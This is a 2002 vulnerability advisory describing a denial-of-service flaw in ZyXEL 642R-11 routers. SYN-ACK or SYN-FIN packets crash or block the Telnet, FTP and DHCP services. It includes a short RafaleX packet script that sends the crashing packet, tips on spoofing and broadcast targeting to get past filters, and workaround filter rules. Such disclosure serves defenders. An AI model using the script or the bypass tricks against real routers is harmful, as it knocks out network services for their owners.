ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

[Kistler Ueli <iuk () gmx ch>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Name: ZyXEL 642R(-11) AJ.6, other routers based on ZyNOS are also
suspectible to this DoS
Systems Affected:  ZyNOS
Severity:  Medium Risk
Category: Denial of Service
Vendor URL: www.zyxel.com

Vendor contacted: 1.6.2002
Vendor fix: -

Summary
- - -------
ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
It is possible to send a packet that will make unavailable
the router's services (Telnet&FTP, DHCP service not tested).
Network traffic isn't stopped.

Possibly more ZyNOS based routers are vulnerable. Please reply if you
found any other ZyNOS based router vulnerable.

Details
- - -------
A ZyXEL 642R-11 router service can be crashed by sending a packet
with TCP flags ACK and SYN set at the same time.
The service will not be available even through RS-232.
Using a SYN-FIN packet will make inaccessible the service port for a
few minutes.

Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
enabled). TELNET and FTP cannot be deactivated.

Bypass packet filter rules:
The IP source can be a spoofed one also. This will allow to "bypass"
a filter that blocks specifc IP's.
As target address you can also use the WAN address in LAN (see
BID3346: http://online.securityfocus.com/bid/3346), if the router's
packet filter
blocks his local address as target.
The DoS attack works also using the broadcast address of the LAN.
This means that all ZyXEL routers in LAN vulnerable
to this attack can be crashed by sending one single packet.

Exploit
- - -------

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed
(V2.50(AJ.6))

!Sleep 1000

!Display=$done

Fix
- - ---
not yet available (17.6.2002). Vendor was contacted 1.6.2002.

Workaround
- - ----------
- - - on WAN device block these packets:
 - all packets coming from WAN to port 21,23 and 67
   (source: 0.0.0.0 -> target: 0.0.0.0, apply on input filter of WAN
device)
- - - on LAN device block these packets, ports 21,23 and 67
 - WAN IP of the router as target IP (Why?
http://online.securityfocus.com/bid/3346..)
 - LAN address of the router as target IP
 - Broadcast address as target IP.. ;)

Regards,
 Ueli Kistler
 eclipse () packx net / iuk () gmx ch
 www.packx.net / www.eclipse.fr.fm (IDScenter 1.09 beta 2 is soon
out)

Greets to PacKX Team (RafaleX packet builder for Win2K/XP)

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBPQ3dBmnfm6NyZfRJEQKxCACfZhLa34IfHY7NL5bSl9NK11nUI+EAoNLF
ZS3YZqNynsew/jYuvcnLhUVT
=hDk8
-----END PGP SIGNATURE-----

Key-ID: 0x7265F449